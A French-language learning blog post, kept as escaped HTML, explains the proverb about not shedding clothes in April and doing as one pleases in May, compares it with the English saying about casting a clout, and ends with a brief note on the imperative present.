Children are allowed to wear the summer school uniform, but is it wise? In France kids are told that <!--more--><em>en avril ne te d\u00e9couvre pas d&rsquo;un fil\u00a0<\/em>(in April, do not remove a single thread of your clothing). It is actually true that one still feels that little nip in the air and that sunglasses don&rsquo;t really protect from getting a cold. However, May is right around the corner and\u00a0<em>en mai, fais ce qu&rsquo;il te pla\u00eet <\/em>(in May, do as you please).<\/p>\n<p style=\"text-align: justify;\">Those two proverbs are usually combined:<br \/><em>e<\/em><em>n avril ne te d\u00e9couvre pas d&rsquo;un fil; en mai, fais ce qu&rsquo;il te pla\u00eet.<\/em><\/p>\n<p>\u00a0<\/p>\n<audio class=\"wp-audio-shortcode\" id=\"audio-290-1\" preload=\"none\" style=\"width: 100%;\" controls=\"controls\"><source type=\"audio\/mpeg\" src=\"https:\/\/frenchalacarte.fr\/wp-content\/uploads\/2016\/04\/avril.m4a?_=1\" \/><a href=\"https:\/\/frenchalacarte.fr\/wp-content\/uploads\/2016\/04\/avril.m4a\">https:\/\/frenchalacarte.fr\/wp-content\/uploads\/2016\/04\/avril.m4a<\/a><\/audio>\n<p>\u00a0<\/p>\n<p style=\"text-align: justify;\">It may correspond (<em>correspondre<\/em>! in French) to the English one:<em>\u00a0Ne&rsquo;er cast a clout till May be out.<br \/>Clout<\/em> is an old word to designate a fragment of cloth or clothing and so the phrase says: never discard you (warm) clothing until May is ended.<\/p>\n<p style=\"text-align: justify;\">We can only conclude that the French language is more optimistic concerning the weather in May than the English one.<\/p>\n<p>\u00a0<\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><em><strong>GRAMMAR<\/strong><\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><em>En avril ne te <span style=\"color: #0000ff;\">d\u00e9couvre<\/span> pas d&rsquo;un fil; en mai, <span style=\"color: #0000ff;\">fais<\/span> ce qu&rsquo;il te pla\u00eet.<br \/><\/em>Both verbs are used in <em>imp\u00e9ratif<\/em> (mode) <em>pr\u00e9sent<\/em> (temps) and refer to the same person (you).
